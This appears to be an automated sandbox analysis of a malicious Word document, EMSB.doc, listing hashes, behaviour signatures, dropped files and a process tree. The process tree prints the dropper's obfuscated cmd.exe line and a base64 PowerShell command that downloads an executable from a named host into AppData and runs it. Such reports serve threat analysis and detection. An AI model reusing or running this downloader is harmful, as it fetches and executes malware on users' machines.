Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-05-2024 17:45

General

  • Target

    EMSB.doc

  • Size

    114KB

  • MD5

    754dc2d09d30c6e9d51a08feb7396dcc

  • SHA1

    f17f2e77515157a1f07338571ffc55db8a2d1573

  • SHA256

    1df932207319ad8505a88a915c3bbf5eb11fd12dba6d921cd107ef497da25692

  • SHA512

    a69edd08a95888287841461ee19508b5e03063052240911f1ebd4cb74f23bb3e40b6f980edce5e1d476498c4cfcc61b091f6173b20785aec916b54e59c6ec8fd

  • SSDEEP

    1536:/9F+u6qHEmcutqTRE23B9bEfAl/eDW3+jYrqCEtvaaeeAbgy1oZUeB6:/+u6Ict73PbE4xrLKngUUeU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kotobelamx.com/DAB/nerimf.php?l=willow2.pas

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\EMSB.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2060
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c p^O^w^e^R^s^H^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^r^A^G^8^A^d^A^B^v^A^G^I^A^Z^Q^B^s^A^G^E^A^b^Q^B^4^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^E^A^E^E^A^Q^g^A^v^A^G^4^A^Z^Q^B^y^A^G^k^A^b^Q^B^m^A^C^4^A^c^A^B^o^A^H^A^A^P^w^B^s^A^D^0^A^d^w^B^p^A^G^w^A^b^A^B^v^A^H^c^A^M^g^A^u^A^H^A^A^Y^Q^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^x^A^D^I^A^M^Q^A^0^A^D^M^A^M^Q^A^z^A^D^Q^A^M^w^A^2^A^D^I^A^M^A^A^3^A^D^Q^A^M^Q^A^u^A^G^U^A^e^A^B^l^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^E^A^M^g^A^x^A^D^Q^A^M^w^A^x^A^D^M^A^N^A^A^z^A^D^Y^A^M^g^A^w^A^D^c^A^N^A^A^x^A^C^4^A^Z^Q^B^4^A^G^U^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^F^A^H^g^A^a^Q^B^0^A^D^s^A
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOweRsHeLL.exe -EC KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBrAG8AdABvAGIAZQBsAGEAbQB4AC4AYwBvAG0ALwBEAEEAQgAvAG4AZQByAGkAbQBmAC4AcABoAHAAPwBsAD0AdwBpAGwAbABvAHcAMgAuAHAAYQBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAxADIAMQA0ADMAMQAzADQAMwA2ADIAMAA3ADQAMQAuAGUAeABlAC4AZQB4AGUAJwApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADEAMgAxADQAMwAxADMANAAzADYAMgAwADcANAAxAC4AZQB4AGUALgBlAHgAZQAnADsAIABFAHgAaQB0ADsA
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4468

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD8BB5.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gbjui03h.4yq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2060-10-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-5-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-9-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-1-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-6-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-7-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-8-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-11-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-16-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-17-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-15-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-14-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-13-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-12-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-566-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-2-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-18-0x00007FFB1F000000-0x00007FFB1F010000-memory.dmp

    Filesize

    64KB

  • memory/2060-19-0x00007FFB1F000000-0x00007FFB1F010000-memory.dmp

    Filesize

    64KB

  • memory/2060-4-0x00007FFB6186D000-0x00007FFB6186E000-memory.dmp

    Filesize

    4KB

  • memory/2060-513-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-529-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-534-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-533-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

    Filesize

    2.0MB

  • memory/2060-3-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-0-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-563-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-564-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-565-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/2060-562-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

    Filesize

    64KB

  • memory/4468-545-0x0000025AEE510000-0x0000025AEE532000-memory.dmp

    Filesize

    136KB